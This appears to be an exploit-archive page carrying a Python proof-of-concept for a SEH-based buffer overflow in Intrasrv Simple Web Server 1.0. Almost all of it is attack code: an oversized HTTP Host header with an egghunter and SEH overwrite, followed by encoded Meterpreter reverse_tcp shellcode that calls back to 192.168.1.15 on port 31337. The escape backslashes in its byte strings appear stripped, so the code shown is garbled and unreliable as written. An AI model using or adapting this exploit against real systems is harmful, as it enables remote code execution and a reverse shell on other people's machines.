[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution
# Published : 2013-05-30
# Author :
# Previous Title : Java Applet Driver Manager Privileged toString() Remote Code Execution
# Next Title : MobileIron Virtual Smartphone Platform Privilege Escalation Exploit
# Exploit Title: Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF
# Date: 29.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://www.leighb.com/intrasrv.htm
# Software Link: http://www.leighb.com/intrasrv.zip
# Version: 1.0
# Tested on: Windows XP SP3 Eng
# Movie:http://www.youtube.com/watch?v=NvCPYA6T9l0&feature=youtu.be
#!/usr/bin/python
import socket
import os
import sys
target="192.168.1.16"
#W00T
egghunter="x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x89xd7xafx75xeaxafx75xe7xffxe7" + "x90"*94
nseh="xEBx80x90x90"#jmp back do egghunter
seh="xddx97x40x00" #0x004097dd, # pop eax # pop ebp # ret - intrasrv.exe
crash = "x90"*1427 + egghunter + nseh + seh + "x90"*2439 #4000 bytes
#windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=31337 R | msfencode -t c -b 'x56' -e x86/alpha_mixed
shellcode = ("T00WT00W" +
"x89xe2xdaxcfxd9x72xf4x58x50x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x59x6cx4bx58x4ex69x47x70x55x50x53x30x75x30x4e"
"x69x6bx55x64x71x78x52x73x54x4ex6bx51x42x64x70"
"x4ex6bx32x72x44x4cx6ex6bx62x72x45x44x6cx4bx30"
"x72x77x58x36x6fx38x37x32x6ax74x66x65x61x79x6f"
"x70x31x49x50x4cx6cx47x4cx63x51x51x6cx65x52x66"
"x4cx71x30x4bx71x48x4fx44x4dx55x51x6ax67x69x72"
"x4cx30x31x42x46x37x4cx4bx33x62x36x70x6ex6bx50"
"x42x75x6cx66x61x6ax70x6ex6bx47x30x51x68x4ex65"
"x69x50x42x54x71x5ax35x51x38x50x52x70x6cx4bx32"
"x68x67x68x4cx4bx71x48x35x70x77x71x39x43x58x63"
"x47x4cx47x39x4cx4bx37x44x4ex6bx65x51x79x46x30"
"x31x49x6fx46x51x59x50x4ex4cx59x51x4ax6fx64x4d"
"x36x61x5ax67x30x38x49x70x34x35x4ax54x55x53x61"
"x6dx39x68x47x4bx73x4dx37x54x32x55x59x72x63x68"
"x4cx4bx32x78x57x54x63x31x59x43x31x76x6cx4bx36"
"x6cx72x6bx4ex6bx33x68x65x4cx65x51x4ax73x6cx4b"
"x44x44x6cx4bx36x61x4ax70x6cx49x61x54x64x64x66"
"x44x61x4bx31x4bx65x31x52x79x51x4ax62x71x69x6f"
"x49x70x46x38x33x6fx53x6ax4ex6bx67x62x58x6bx4e"
"x66x53x6dx35x38x45x63x55x62x33x30x67x70x33x58"
"x53x47x64x33x54x72x31x4fx33x64x72x48x42x6cx31"
"x67x65x76x73x37x6bx4fx39x45x4dx68x5ax30x47x71"
"x37x70x77x70x74x69x59x54x62x74x42x70x42x48x64"
"x69x4bx30x30x6bx37x70x79x6fx58x55x32x70x42x70"
"x30x50x76x30x37x30x42x70x77x30x72x70x63x58x4b"
"x5ax34x4fx39x4fx79x70x79x6fx4ex35x6dx47x33x5a"
"x34x45x71x78x4bx70x6fx58x57x71x46x6fx42x48x54"
"x42x47x70x43x4ax72x49x4ex69x6ax46x31x7ax34x50"
"x31x46x70x57x73x58x6ex79x4fx55x63x44x35x31x6b"
"x4fx69x45x4dx55x6bx70x44x34x74x4cx6bx4fx50x4e"
"x67x78x71x65x4ax4cx63x58x58x70x38x35x49x32x51"
"x46x59x6fx6ex35x51x7ax63x30x70x6ax66x64x53x66"
"x50x57x45x38x44x42x39x49x68x48x43x6fx4bx4fx6e"
"x35x4cx4bx64x76x30x6ax73x70x33x58x73x30x66x70"
"x67x70x55x50x72x76x42x4ax67x70x75x38x63x68x69"
"x34x50x53x68x65x4bx4fx49x45x7ax33x71x43x73x5a"
"x57x70x73x66x61x43x42x77x50x68x63x32x6bx69x79"
"x58x31x4fx39x6fx4ax75x35x51x4fx33x36x49x38x46"
"x4cx45x59x66x42x55x4ax4cx4fx33x41x41")
buffer="GET / HTTP/1.1rn"
buffer+="Host: " + crash + "rn"
buffer+="Content-Type: application/x-www-form-urlencodedrn"
buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)rn"
buffer+="Content-Length: 1048580rnrn"
buffer+=shellcode
one = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
one.connect((target, 80))
one.send(buffer)
one.close()